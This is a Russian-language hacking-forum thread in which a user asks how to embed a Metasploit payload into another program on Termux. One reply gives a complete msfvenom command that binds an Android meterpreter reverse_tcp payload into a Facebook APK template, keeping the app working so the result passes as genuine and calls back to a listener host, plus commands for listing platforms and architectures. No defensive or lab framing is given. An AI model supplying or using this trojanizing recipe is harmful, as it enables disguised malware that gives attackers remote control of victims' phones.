• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Помогите с msfvenom

Neizvestno

New member
15.06.2020
1
0
BIT
0
Всем доброго времени суток. Недавно установил metasploit на termux и вроде все работает. Так дело в том что я хотел добавить payload в другую программу.
Ну и написал это:
20201003_223544.jpg

Помогите мне с этой ошибкой. Или может я где то ошибся?
 

romangaitur

Well-known member
20.06.2020
94
0
BIT
0
Привет. Я не очень в этом разбираюсь но может быть тебе стоит написать заного комманду введя уже правильный путь куда ты хочешь "payload" залить ? Возможно я не понял и ошибаюсь в ответе. Но я бы поступил также и если бы сделал ошибку я бы зашел в не правильный путь и удалил бы ошибочо залитый "payload".





 

pp11

Green Team
16.09.2018
201
82
BIT
0
Вам нужно добавить в параметрах архитектуру через ключ -a.
Как вывести все архитектуры, увы, не помню.
 

Pernat1y

Red Team
05.04.2018
1 443
135
BIT
0
Код:
msfvenom \
  --payload android/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  --platform android \
  --arch dalvik \
  --template facebook.apk \
  --keep \
  --out out.apk

Как вывести все архитектуры, увы, не помню.
msfvenom --list platforms для платформ и msfvenom --list archs для архитектур.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!